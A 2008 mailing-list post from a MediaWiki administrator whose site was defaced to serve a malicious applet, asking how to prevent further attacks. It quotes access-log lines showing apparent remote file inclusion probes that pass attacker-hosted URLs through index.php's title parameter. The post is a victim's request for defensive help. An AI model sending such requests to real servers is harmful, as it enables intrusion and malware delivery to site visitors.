[Mediawiki-l] Index.php page under hackers attack?
Itay Ophir
itay at worldwideworkshop.org
Fri Mar 14 13:52:31 UTC 2008
Hi Everyone,
I hope this is the right place to ask about this (pls point me elsewhere is
needed)
Our MediaWiki was hacked (twice in the past month) and someone was able to
change the root index.html files of our website and add an Iframe to it that
loads a malicious java applet. If users select to run the applet it installs
a virus/torjan on their PC.
After reading the log file I am thinking it's the Wiki's index.php page. The
hosting is NetworkS' who said that I have a vulnerable php script. And I
should fix it.
This is from the log files:
XX.XX.XX.XX - - [29/Feb/2008:00:00:30 -0500] "GET
/wiki/index.php?title=Http://uuionmaniskis.rbcmail.ru/images%3F HTTP/1.1"
200 1688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:00:29 -0500] "GET
/wiki/index.php?title=http://uuionmaniskis.rbcmail.ru/images? HTTP/1.1" 301
96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:01:41 -0500] "GET
/wiki/index.php?title=http://uuionmaniskis.rbcmail.ru/images? HTTP/1.1" 301
96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322)"
XX.XX.XX - - [29/Feb/2008:00:01:19 -0500] "GET
/wiki/index.php?title=http://sschhhoolsucksmmman.krovatka.su/images?
HTTP/1.1" 301 96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:05:48 -0500] "GET
/wiki/index.php?title=Http://zaperyan1918moon.chat.ru/html/aboutme%3F
HTTP/1.1" 200 1700 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 1.1.4322)"
Can anyone advice on how to protect it/prevent future attacks?
Thanks a lot in advance!
Itay
More information about the MediaWiki-l
mailing list